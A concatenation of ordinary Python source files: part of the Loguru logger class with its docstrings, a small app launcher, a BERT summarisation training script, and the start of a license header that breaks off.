will be called only if the level is high enough. This can be used to avoid calling expensive
functions when not necessary.
colors : |bool|, optional
If ``True``, the logged message will be colorized according to the markups it possibly
contains.
raw : |bool|, optional
If ``True``, the formatting of each sink will be bypassed and the message will be sent
as is.
capture : |bool|, optional
If ``False``, the ``**kwargs`` of the logged message will not automatically populate
the ``extra`` dict (although they are still used for formatting).
depth : |int|, optional
Specify which stacktrace should be used to contextualize the logged message. This is
useful while using the logger from inside a wrapped function to retrieve worthwhile
information.
ansi : |bool|, optional
Deprecated since version 0.4.1: the ``ansi`` parameter will be removed in Loguru 1.0.0,
it is replaced by ``colors`` which is a more appropriate name.
Returns
-------
:class:`~Logger`
A logger wrapping the core logger, but transforming logged message adequately before
sending.
Examples
--------
>>> try:
... 1 / 0
... except ZeroDivisionError:
... logger.opt(exception=True).debug("Exception logged with debug level:")
...
[18:10:02] DEBUG in '<module>' - Exception logged with debug level:
Traceback (most recent call last, catch point marked):
> File "<stdin>", line 2, in <module>
ZeroDivisionError: division by zero
>>> logger.opt(record=True).info("Current line is: {record[line]}")
[18:10:33] INFO in '<module>' - Current line is: 1
>>> logger.opt(lazy=True).debug("If sink <= DEBUG: {x}", x=lambda: math.factorial(2**5))
[18:11:19] DEBUG in '<module>' - If sink <= DEBUG: 263130836933693530167218012160000000
>>> logger.opt(colors=True).warning("We got a <red>BIG</red> problem")
[18:11:30] WARNING in '<module>' - We got a BIG problem
>>> logger.opt(raw=True).debug("No formatting\n")
No formatting
>>> logger.opt(capture=False).info("Displayed but not captured: {value}", value=123)
[18:11:41] Displayed but not captured: 123
>>> def wrapped():
... logger.opt(depth=1).info("Get parent context")
...
>>> def func():
... wrapped()
...
>>> func()
[18:11:54] INFO in 'func' - Get parent context
"""
if ansi:
colors = True
warnings.warn(
"The 'ansi' parameter is deprecated, please use 'colors' instead",
DeprecationWarning,
)
args = self._options[-2:]
return Logger(self._core, exception, depth, record, lazy, colors, raw, capture, *args)
def bind(__self, **kwargs):
"""Bind attributes to the ``extra`` dict of each logged message record.
This is used to add custom context to each logging call.
Parameters
----------
**kwargs
Mapping between keys and values that will be added to the ``extra`` dict.
Returns
-------
:class:`~Logger`
A logger wrapping the core logger, but which sends record with the customized ``extra``
dict.
Examples
--------
>>> logger.add(sys.stderr, format="{extra[ip]} - {message}")
>>> class Server:
... def __init__(self, ip):
... self.ip = ip
... self.logger = logger.bind(ip=ip)
... def call(self, message):
... self.logger.info(message)
...
>>> instance_1 = Server("192.168.0.200")
>>> instance_2 = Server("127.0.0.1")
>>> instance_1.call("First instance")
192.168.0.200 - First instance
>>> instance_2.call("Second instance")
127.0.0.1 - Second instance
"""
*options, extra = __self._options
return Logger(__self._core, *options, {**extra, **kwargs})
@contextlib.contextmanager
def contextualize(__self, **kwargs):
"""Bind attributes to the context-local ``extra`` dict while inside the ``with`` block.
Contrary to |bind|, there is no ``logger`` returned; the ``extra`` dict is modified in-place
and updated globally. Most importantly, it uses |contextvars|, which means that
contextualized values are unique to each thread and asynchronous task.
The ``extra`` dict will recover its initial state once the context manager is exited.
Parameters
----------
**kwargs
Mapping between keys and values that will be added to the context-local ``extra`` dict.
Returns
-------
:term:`context manager` / :term:`decorator`
A context manager (usable as a decorator too) that will bind the attributes once entered
and restore the initial state of the ``extra`` dict once exited.
Examples
--------
>>> logger.add(sys.stderr, format="{message} | {extra}")
1
>>> def task():
... logger.info("Processing!")
...
>>> with logger.contextualize(task_id=123):
... task()
...
Processing! | {'task_id': 123}
>>> logger.info("Done.")
Done. | {}
"""
with __self._core.lock:
new_context = {**context.get(), **kwargs}
token = context.set(new_context)
try:
yield
finally:
with __self._core.lock:
context.reset(token)
def patch(self, patcher):
"""Attach a function to modify the record dict created by each logging call.
The ``patcher`` may be used to update the record on-the-fly before it's propagated to the
handlers. This allows the "extra" dict to be populated with dynamic values and also permits
advanced modifications of the record emitted while logging a message. The function is called
once before sending the log message to the different handlers.
It is recommended to apply modifications to the ``record["extra"]`` dict rather than to the
``record`` dict itself, as some values are used internally by `Loguru`, and modifying them may
produce unexpected results.
Parameters
----------
patcher: |callable|_
The function to which the record dict will be passed as the sole argument. This function
is in charge of updating the record in-place; it does not need to return any
value, as the modified record object will be re-used.
Returns
-------
:class:`~Logger`
A logger wrapping the core logger, but whose records are passed through the ``patcher``
function before being sent to the added handlers.
Examples
--------
>>> logger.add(sys.stderr, format="{extra[utc]} {message}")
>>> logger = logger.patch(lambda record: record["extra"].update(utc=datetime.utcnow()))
>>> logger.info("That way, you can log messages with time displayed in UTC")
>>> def wrapper(func):
... @functools.wraps(func)
... def wrapped(*args, **kwargs):
... logger.patch(lambda r: r.update(function=func.__name__)).info("Wrapped!")
... return func(*args, **kwargs)
... return wrapped
>>> def recv_record_from_network(pipe):
... record = pickle.loads(pipe.read())
... level, message = record["level"], record["message"]
... logger.patch(lambda r: r.update(record)).log(level, message)
"""
*options, _, extra = self._options
return Logger(self._core, *options, patcher, extra)
def level(self, name, no=None, color=None, icon=None):
"""Add, update or retrieve a logging level.
Logging levels are defined by their ``name`` to which a severity ``no``, an ansi ``color``
tag and an ``icon`` are associated and possibly modified at run-time. To |log| to a custom
level, you should necessarily use its name; the severity number is not linked back to the
level's name (this implies that several levels can share the same severity).
To add a new level, its ``name`` and its ``no`` are required. A ``color`` and an ``icon``
can also be specified or will be empty by default.
To update an existing level, pass its ``name`` with the parameters to be changed. It is not
possible to modify the ``no`` of a level once it has been added.
To retrieve level information, the ``name`` solely suffices.
Parameters
----------
name : |str|
The name of the logging level.
no : |int|
The severity of the level to be added or updated.
color : |str|
The color markup of the level to be added or updated.
icon : |str|
The icon of the level to be added or updated.
Returns
-------
``Level``
A |namedtuple| containing information about the level.
Raises
------
ValueError
If there is no level registered with such ``name``.
Examples
--------
>>> level = logger.level("ERROR")
>>> print(level)
Level(name='ERROR', no=40, color='<red><bold>', icon='❌')
>>> logger.add(sys.stderr, format="{level.no} {level.icon} {message}")
1
>>> logger.level("CUSTOM", no=15, color="<blue>", icon="@")
Level(name='CUSTOM', no=15, color='<blue>', icon='@')
>>> logger.log("CUSTOM", "Logging...")
15 @ Logging...
>>> logger.level("WARNING", icon=r"/!\\")
Level(name='WARNING', no=30, color='<yellow><bold>', icon='/!\\\\')
>>> logger.warning("Updated!")
30 /!\\ Updated!
"""
if not isinstance(name, str):
raise TypeError(
"Invalid level name, it should be a string, not: '%s'" % type(name).__name__
)
if no is color is icon is None:
try:
return self._core.levels[name]
except KeyError:
raise ValueError("Level '%s' does not exist" % name) from None
if name not in self._core.levels:
if no is None:
raise ValueError(
"Level '%s' does not exist, you have to create it by specifying a level no"
% name
)
else:
old_color, old_icon = "", " "
elif no is not None:
raise TypeError("Level '%s' already exists, you can't update its severity no" % name)
else:
_, no, old_color, old_icon = self.level(name)
if color is None:
color = old_color
if icon is None:
icon = old_icon
if not isinstance(no, int):
raise TypeError(
"Invalid level no, it should be an integer, not: '%s'" % type(no).__name__
)
if no < 0:
raise ValueError("Invalid level no, it should be a positive integer, not: %d" % no)
ansi = Colorizer.ansify(color)
level = Level(name, no, color, icon)
with self._core.lock:
self._core.levels[name] = level
self._core.levels_ansi_codes[name] = ansi
for handler in self._core.handlers.values():
handler.update_format(name)
return level
def disable(self, name):
"""Disable logging of messages coming from ``name`` module and its children.
Developers of libraries using `Loguru` should absolutely disable it to avoid disrupting
users with unrelated log messages.
Note that in some rare circumstances, it is not possible for `Loguru` to
determine the module's ``__name__`` value. In such a situation, ``record["name"]`` will be
equal to ``None``, which is why ``None`` is also a valid argument.
Parameters
----------
name : |str| or ``None``
The name of the parent module to disable.
Examples
--------
>>> logger.info("Allowed message by default")
[22:21:55] Allowed message by default
>>> logger.disable("my_library")
>>> logger.info("While publishing a library, don't forget to disable logging")
"""
self._change_activation(name, False)
def enable(self, name):
"""Enable logging of messages coming from ``name`` module and its children.
Logging is generally disabled by imported libraries using `Loguru`, hence this function
allows users to receive these messages anyway.
To enable all logs regardless of the module they are coming from, an empty string ``""`` can
be passed.
Parameters
----------
name : |str| or ``None``
The name of the parent module to re-allow.
Examples
--------
>>> logger.disable("__main__")
>>> logger.info("Disabled, so nothing is logged.")
>>> logger.enable("__main__")
>>> logger.info("Re-enabled, messages are logged.")
[22:46:12] Re-enabled, messages are logged.
"""
self._change_activation(name, True)
def configure(self, *, handlers=None, levels=None, extra=None, patcher=None, activation=None):
"""Configure the core logger.
It should be noted that ``extra`` values set using this function are available across all
modules, so this is the best way to set overall default values.
Parameters
----------
handlers : |list| of |dict|, optional
A list of each handler to be added. The list should contain dicts of params passed to
the |add| function as keyword arguments. If not ``None``, all previously added
handlers are first removed.
levels : |list| of |dict|, optional
A list of each level to be added or updated. The list should contain dicts of params
passed to the |level| function as keyword arguments. This will never remove previously
created levels.
extra : |dict|, optional
A dict containing additional parameters bound to the core logger, useful to share
common properties if you call |bind| in several of your files or modules. If not ``None``,
this will replace the previously configured ``extra`` dict.
patcher : |callable|_, optional
A function that will be applied to the record dict of each logged message across all
modules using the logger. It should modify the dict in-place without returning anything.
The function is executed prior to the one possibly added by the |patch| method. If not
``None``, this will replace previously configured ``patcher`` function.
activation : |list| of |tuple|, optional
A list of ``(name, state)`` tuples which denote which loggers should be enabled (if
``state`` is ``True``) or disabled (if ``state`` is ``False``). The calls to |enable|
and |disable| are made according to the list order. This will not modify previously
activated loggers, so if you need a fresh start prepend your list with ``("", False)``
or ``("", True)``.
Returns
-------
:class:`list` of :class:`int`
A list containing the identifiers of added sinks (if any).
Examples
--------
>>> logger.configure(
... handlers=[
... dict(sink=sys.stderr, format="[{time}] {message}"),
... dict(sink="file.log", enqueue=True, serialize=True),
... ],
... levels=[dict(name="NEW", no=13, icon="¤", color="")],
... extra={"common_to_all": "default"},
... patcher=lambda record: record["extra"].update(some_value=42),
... activation=[("my_module.secret", False), ("another_library.module", True)],
... )
[1, 2]
>>> # Set a default "extra" dict to logger across all modules, without "bind()"
>>> extra = {"context": "foo"}
>>> logger.configure(extra=extra)
>>> logger.add(sys.stderr, format="{extra[context]} - {message}")
>>> logger.info("Context without bind")
>>> # => "foo - Context without bind"
>>> logger.bind(context="bar").info("Suppress global context")
>>> # => "bar - Suppress global context"
"""
if handlers is not None:
self.remove()
else:
handlers = []
if levels is not None:
for params in levels:
self.level(**params)
if patcher is not None:
with self._core.lock:
self._core.patcher = patcher
if extra is not None:
with self._core.lock:
self._core.extra.clear()
self._core.extra.update(extra)
if activation is not None:
for name, state in activation:
if state:
self.enable(name)
else:
self.disable(name)
return [self.add(**params) for params in handlers]
def _change_activation(self, name, status):
if not (name is None or isinstance(name, str)):
raise TypeError(
"Invalid name, it should be a string (or None), not: '%s'" % type(name).__name__
)
with self._core.lock:
enabled = self._core.enabled.copy()
if name is None:
for n in enabled:
if n is None:
enabled[n] = status
self._core.activation_none = status
self._core.enabled = enabled
return
if name != "":
name += "."
activation_list = [
(n, s) for n, s in self._core.activation_list if n[: len(name)] != name
]
parent_status = next((s for n, s in activation_list if name[: len(n)] == n), None)
if parent_status != status and not (name == "" and status is True):
activation_list.append((name, status))
def modules_depth(x):
return x[0].count(".")
activation_list.sort(key=modules_depth, reverse=True)
for n in enabled:
if n is not None and (n + ".")[: len(name)] == name:
enabled[n] = status
self._core.activation_list = activation_list
self._core.enabled = enabled
@staticmethod
def parse(file, pattern, *, cast={}, chunk=2 ** 16):
"""Parse raw logs and extract each entry as a |dict|.
The logging format has to be specified as the regex ``pattern``; it will then be
used to parse the ``file`` and retrieve each entry based on the named groups present
in the regex.
Parameters
----------
file : |str|, |Path| or |file-like object|_
The path of the log file to be parsed, or an already opened file object.
pattern : |str| or |re.Pattern|_
The regex to use for log parsing; it should contain named groups which will be included
in the returned dict.
cast : |callable|_ or |dict|, optional
A function that should convert in-place the regex groups parsed (a dict of string
values) to more appropriate types. If a dict is passed, it should be a mapping between
keys of the parsed log dict and the functions that should be used to convert the associated
values.
chunk : |int|, optional
The number of bytes read while iterating through the logs; this avoids having to load
the whole file into memory.
Yields
------
:class:`dict`
The dict mapping regex named groups to matched values, as returned by |match.groupdict|
and optionally converted according to ``cast`` argument.
Examples
--------
>>> reg = r"(?P<lvl>[0-9]+): (?P<msg>.*)" # If log format is "{level.no} - {message}"
>>> for e in logger.parse("file.log", reg): # A file line could be "10 - A debug message"
... print(e) # => {'lvl': '10', 'msg': 'A debug message'}
>>> caster = dict(lvl=int) # Parse 'lvl' key as an integer
>>> for e in logger.parse("file.log", reg, cast=caster):
... print(e) # => {'lvl': 10, 'msg': 'A debug message'}
>>> def cast(groups):
... if "date" in groups:
... groups["date"] = datetime.strptime(groups["date"], "%Y-%m-%d %H:%M:%S")
...
>>> with open("file.log") as file:
... for log in logger.parse(file, reg, cast=cast):
... print(log["date"], log["something_else"])
"""
if isinstance(file, (str, PathLike)):
should_close = True
fileobj = open(str(file))
elif hasattr(file, "read") and callable(file.read):
should_close = False
fileobj = file
else:
raise TypeError(
"Invalid file, it should be a string path or a file object, not: '%s'"
% type(file).__name__
)
if isinstance(cast, dict):
def cast_function(groups):
for key, converter in cast.items():
if key in groups:
groups[key] = converter(groups[key])
elif callable(cast):
cast_function = cast
else:
raise TypeError(
"Invalid cast, it should be a function or a dict, not: '%s'" % type(cast).__name__
)
try:
regex = re.compile(pattern)
except TypeError:
raise TypeError(
"Invalid pattern, it should be a string or a compiled regex, not: '%s'"
% type(pattern).__name__
) from None
matches = Logger._find_iter(fileobj, regex, chunk)
for match in matches:
groups = match.groupdict()
cast_function(groups)
yield groups
if should_close:
fileobj.close()
@staticmethod
def _find_iter(fileobj, regex, chunk):
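# Read the file chunk by chunk and run the regex over a growing buffer. The initial
# "read(0)" returns an empty str or bytes matching the file mode. Every match except
# the last one is safe to yield immediately; the last match might be incomplete (the
# entry could continue in the next chunk), so it stays in the buffer until more data
# is read or the end of the file is reached.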
buffer = fileobj.read(0)
while 1:
text = fileobj.read(chunk)
buffer += text
matches = list(regex.finditer(buffer))
if not text:
yield from matches
break
if len(matches) > 1:
end = matches[-2].end()
buffer = buffer[end:]
yield from matches[:-1]
def _log(self, level_id, static_level_no, from_decorator, options, message, args, kwargs):
core = self._core
if not core.handlers:
return
(exception, depth, record, lazy, colors, raw, capture, patcher, extra) = options
frame = get_frame(depth + 2)
try:
name = frame.f_globals["__name__"]
except KeyError:
name = None
try:
if not core.enabled[name]:
return
except KeyError:
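# The activation status of this module is not cached yet: derive it from the
# activation list and memoize the result in "core.enabled".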
enabled = core.enabled
if name is None:
status = core.activation_none
enabled[name] = status
if not status:
return
else:
dotted_name = name + "."
for dotted_module_name, status in core.activation_list:
if dotted_name[: len(dotted_module_name)] == dotted_module_name:
if status:
break
enabled[name] = False
return
enabled[name] = True
current_datetime = aware_now()
if level_id is None:
level_icon = " "
level_no = static_level_no
level_name = "Level %d" % level_no
else:
try:
level_name, level_no, _, level_icon = core.levels[level_id]
except KeyError:
raise ValueError("Level '%s' does not exist" % level_id) from None
if level_no < core.min_level:
return
code = frame.f_code
file_path = code.co_filename
file_name = basename(file_path)
thread = current_thread()
process = current_process()
elapsed = current_datetime - start_time
if exception:
if isinstance(exception, BaseException):
type_, value, traceback = (type(exception), exception, exception.__traceback__)
elif isinstance(exception, tuple):
type_, value, traceback = exception
else:
type_, value, traceback = sys.exc_info()
exception = RecordException(type_, value, traceback)
else:
exception = None
log_record = {
"elapsed": elapsed,
"exception": exception,
"extra": {**core.extra, **context.get(), **extra},
"file": RecordFile(file_name, file_path),
"function": code.co_name,
"level": RecordLevel(level_name, level_no, level_icon),
"line": frame.f_lineno,
"message": message,
"module": splitext(file_name)[0],
"name": name,
"process": RecordProcess(process.ident, process.name),
"thread": RecordThread(thread.ident, thread.name),
"time": current_datetime,
}
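        # With .opt(lazy=True), positional and keyword arguments are callables
        # that are evaluated only now, after the record has passed the module
        # activation and level checks.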
if lazy:
args = [arg() for arg in args]
kwargs = {key: value() for key, value in kwargs.items()}
if capture and kwargs:
log_record["extra"].update(kwargs)
if record:
if "record" in kwargs:
raise TypeError(
"The message can't be formatted: 'record' shall not be used as a keyword "
"argument while logger has been configured with '.opt(record=True)'"
)
kwargs.update(record=log_record)
if colors:
if args or kwargs:
colored_message = Colorizer.prepare_message(message, args, kwargs)
else:
colored_message = Colorizer.prepare_simple_message(message)
log_record["message"] = colored_message.stripped
elif args or kwargs:
colored_message = None
log_record["message"] = message.format(*args, **kwargs)
else:
colored_message = None
if core.patcher:
core.patcher(log_record)
if patcher:
patcher(log_record)
for handler in core.handlers.values():
handler.emit(log_record, level_id, from_decorator, raw, colored_message)
def trace(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'TRACE'``."""
__self._log("TRACE", None, False, __self._options, __message, args, kwargs)
def debug(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'DEBUG'``."""
__self._log("DEBUG", None, False, __self._options, __message, args, kwargs)
def info(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'INFO'``."""
__self._log("INFO", None, False, __self._options, __message, args, kwargs)
def success(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'SUCCESS'``."""
__self._log("SUCCESS", None, False, __self._options, __message, args, kwargs)
def warning(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'WARNING'``."""
__self._log("WARNING", None, False, __self._options, __message, args, kwargs)
def error(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'ERROR'``."""
__self._log("ERROR", None, False, __self._options, __message, args, kwargs)
def critical(__self, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``'CRITICAL'``."""
__self._log("CRITICAL", None, False, __self._options, __message, args, kwargs)
def exception(__self, __message, *args, **kwargs):
r"""Convenience method for logging an ``'ERROR'`` with exception information."""
options = (True,) + __self._options[1:]
__self._log("ERROR", None, False, options, __message, args, kwargs)
def log(__self, __level, __message, *args, **kwargs):
r"""Log ``message.format(*args, **kwargs)`` with severity ``level``."""
level_id, static_level_no = __self._dynamic_level(__level)
__self._log(level_id, static_level_no, False, __self._options, __message, args, kwargs)
@staticmethod
@functools.lru_cache(maxsize=32)
def _dynamic_level(level):
if isinstance(level, str):
return (level, None)
if isinstance(level, int):
if level < 0:
raise ValueError(
"Invalid level value, it should be a positive integer, not: %d" % level
)
return (None, level)
raise TypeError(
"Invalid level, it should be an integer or a string, not: '%s'" % type(level).__name__
)
def start(self, *args, **kwargs):
"""Deprecated function to |add| a new handler.
Warnings
--------
.. deprecated:: 0.2.2
            ``start()`` will be removed in Loguru 1.0.0; it is replaced by ``add()``, which is
            a less confusing name.
"""
warnings.warn(
"The 'start()' method is deprecated, please use 'add()' instead", DeprecationWarning
)
return self.add(*args, **kwargs)
def stop(self, *args, **kwargs):
"""Deprecated function to |remove| an existing handler.
Warnings
--------
.. deprecated:: 0.2.2
            ``stop()`` will be removed in Loguru 1.0.0; it is replaced by ``remove()``, which is
            a less confusing name.
"""
warnings.warn(
"The 'stop()' method is deprecated, please use 'remove()' instead", DeprecationWarning
)
return self.remove(*args, **kwargs)
|
app.py
|
#!/bin/python3
import threading
import msg_handler
import http_interface
msgThread = threading.Thread(target=lambda: msg_handler.mainLoop())
msgThread.daemon = True
msgThread.start()
http_interface.app.run(host='localhost', port=8080)
|
train_abstractive.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
from pytorch_transformers import BertTokenizer
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.loss import abs_loss
from models.model_builder import AbsSummarizer
from models.predictor import build_predictor
from models.trainer import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'emb_size', 'enc_layers', 'enc_hidden_size', 'enc_ff_size',
'dec_layers', 'dec_hidden_size', 'dec_ff_size', 'encoder', 'ff_actv', 'use_interval']
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def train_abs_multi(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' % gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
            raise AssertionError("An error occurred in Distributed initialization")
train_abs_single(args, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def validate_abs(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
if (args.test_start_from != -1 and step < args.test_start_from):
xent_lst.append((1e6, cp))
continue
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:5]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test_abs(args, device_id, cp, step)
else:
while (True):
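            # Poll model_path for fresh checkpoints: whenever a newer, non-empty
            # 'model_step_*.pt' appears, validate and test it; otherwise sleep
            # and check again.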
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test_abs(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
valid_iter = data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
if args.cased:
tokenizer = BertTokenizer.from_pretrained('BETO/', cache_dir=args.temp_dir)
else:
tokenizer = BertTokenizer.from_pretrained('BETO/', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
valid_loss = abs_loss(model.generator, symbols, model.vocab_size, train=False, device=device)
trainer = build_trainer(args, device_id, model, None, valid_loss)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test_abs(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
if args.cased:
tokenizer = BertTokenizer.from_pretrained('BETO/', cache_dir=args.temp_dir)
else:
tokenizer = BertTokenizer.from_pretrained('BETO/', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, step)
def test_text_abs(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if pt != '':
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if k in model_flags:
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
if args.cased:
tokenizer = BertTokenizer.from_pretrained('BETO/', cache_dir=args.temp_dir)
else:
tokenizer = BertTokenizer.from_pretrained('BETO/', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, step)
def baseline(args, cal_lead=False, cal_oracle=False):
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, 'cpu',
shuffle=False, is_test=True)
trainer = build_trainer(args, '-1', None, None, None)
#
if cal_lead:
trainer.test(test_iter, 0, cal_lead=True)
elif cal_oracle:
trainer.test(test_iter, 0, cal_oracle=True)
def train_abs(args, device_id):
if (args.world_size > 1):
train_abs_multi(args)
else:
train_abs_single(args, device_id)
def train_abs_single(args, device_id):
init_logger(args.log_file)
logger.info(str(args))
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
else:
checkpoint = None
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = AbsSummarizer(args, device, checkpoint)
if (args.sep_optim):
optim_bert = model_builder.build_optim_bert(args, model, checkpoint)
optim_dec = model_builder.build_optim_dec(args, model, checkpoint)
optim = [optim_bert, optim_dec]
else:
optim = [model_builder.build_optim(args, model, checkpoint)]
logger.info(model)
if args.cased:
tokenizer = BertTokenizer.from_pretrained('BETO/', cache_dir=args.temp_dir)
else:
tokenizer = BertTokenizer.from_pretrained('BETO/', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
train_loss = abs_loss(model.generator, symbols, model.vocab_size, device, train=True,
label_smoothing=args.label_smoothing)
trainer = build_trainer(args, device_id, model, optim, train_loss)
trainer.train(train_iter_fct, args.train_steps)
|
test_wrapper.py
|
from __future__ import division, absolute_import, print_function
__copyright__ = "Copyright (C) 2009 Andreas Kloeckner"
__license__ = """
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
